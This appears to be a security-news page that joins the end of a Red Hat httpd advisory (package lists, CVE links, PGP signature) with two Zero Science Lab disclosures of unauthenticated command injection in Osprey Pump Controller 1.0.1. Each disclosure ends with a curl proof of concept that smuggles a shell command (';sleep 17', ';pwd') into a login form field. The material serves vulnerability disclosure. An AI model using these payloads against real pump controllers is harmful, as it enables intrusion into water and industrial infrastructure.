httpd-manual-2.4.53-7.el9_1.1.noarch.rpm

ppc64le:  
httpd-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-core-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-devel-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-tools-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ldap-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_lua-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_session-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ssl-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm

s390x:  
httpd-2.4.53-7.el9_1.1.s390x.rpm  
httpd-core-2.4.53-7.el9_1.1.s390x.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.s390x.rpm  
httpd-devel-2.4.53-7.el9_1.1.s390x.rpm  
httpd-tools-2.4.53-7.el9_1.1.s390x.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_ldap-2.4.53-7.el9_1.1.s390x.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_lua-2.4.53-7.el9_1.1.s390x.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.s390x.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_session-2.4.53-7.el9_1.1.s390x.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_ssl-2.4.53-7.el9_1.1.s390x.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.s390x.rpm

x86_64:  
httpd-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-core-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-devel-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-tools-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ldap-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_lua-2.4.53-7.el9_1.1.x86_64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_session-2.4.53-7.el9_1.1.x86_64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ssl-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2006-20001  
https://access.redhat.com/security/cve/CVE-2022-36760  
https://access.redhat.com/security/cve/CVE-2022-37436  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zuNzjgjWX9erEAQj8Rw/+Lo4L2fajs5cjfJGlBZU9i7mBNfFCJCks  
BSZ63H60gFLhncObvfY3N2wlNjyKL5lWA2w6hgTjnvhUQgYTkEVay7tgtLt359oy  
6c2J8ZKvjhBNeVqLhgnI5/gzzXsqVPwRLlRWlHZwrp1o5Edx0GDpcQUZTvCG46Uy  
oXpacnO9DnWuCMjiTCkM+MUFYrpZxVq4ezjOp1pB5ySlX4c2k3wYP3Usw0H88ZK+  
tVS/Cupd9JItOLriPlRJWQzuddtlzFe8KbETUOPcrOBwdgDupmUhYRPuBDwUuIKP  
4dgJ2t33fJGrPzCAArJkHnwgPchYrAEqvfbjwgLD4sBMr2mu40axgTKP6XYJ5ZsU  
Y6v/bszTLGnqJ5AoPs06PZoetU7Qt9hDN8FFJJK5ou1yTXMCpoyYj9QaQ4qkKfKC  
P/ooesrX2BSo/mrnx0XL0SoSPiKuHGKE8T0dhdw12N5mFrR/IWNxi5/u7o0jrIUt  
6qCz4jNS4xgMbdAMVvxO+CUbmO260S57kEvm+YHXxSSNZYGbDQpvx9EnCLvuraDK  
CHyUPjWHh1/a3xisc+KCn2CJf9gBMwCd7MpcU0enScrAUUE/VYtSejnfjP6NF1js  
gK0pSZN/G+YMRtBjajTCwPIAA6nAZt3zBJSfpxxJP26qT9oOpz/SxXcPFz2IbE28  
ZB4pvXtUnng=  
=WleW  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0970-01

Osprey Pump Controller version 1.0.1 suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the userName HTTP POST parameter called by index.php script.

    Osprey Pump Controller 1.0.1 (userName) Blind Command InjectionVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: The pump controller suffers from an unauthenticated OS commandinjection vulnerability. This can be exploited to inject and executearbitrary shell commands through the 'userName' HTTP POST parametercalled by index.php script.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5749Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5749.php05.01.2023--$ curl -s http://TARGET/index.php --data="userName=;sleep%2017&pseudonym=251"HTTP/1.1 200 OK

Osprey Pump Controller 1.0.1 userName Command Injection

Osprey Pump Controller version 1.0.1 suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the pseudonym HTTP POST parameter called by index.php script.

    Osprey Pump Controller 1.0.1 (pseudonym) Semi-blind Command InjectionVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: The pump controller suffers from an unauthenticated OS commandinjection vulnerability. This can be exploited to inject and executearbitrary shell commands through the 'pseudonym' HTTP POST parametercalled by index.php script.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5748Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5748.php05.01.2023--$ curl -s http://TARGET/index.php --data="userName=thricer&pseudonym=%3Bpwd"HTTP/1.1 200 OK$ sleep 3$ #Reflected URL Address Bar: http://TARGET/index.php?userName=thricer&sessionCode=/var/www/html

Tag

#linux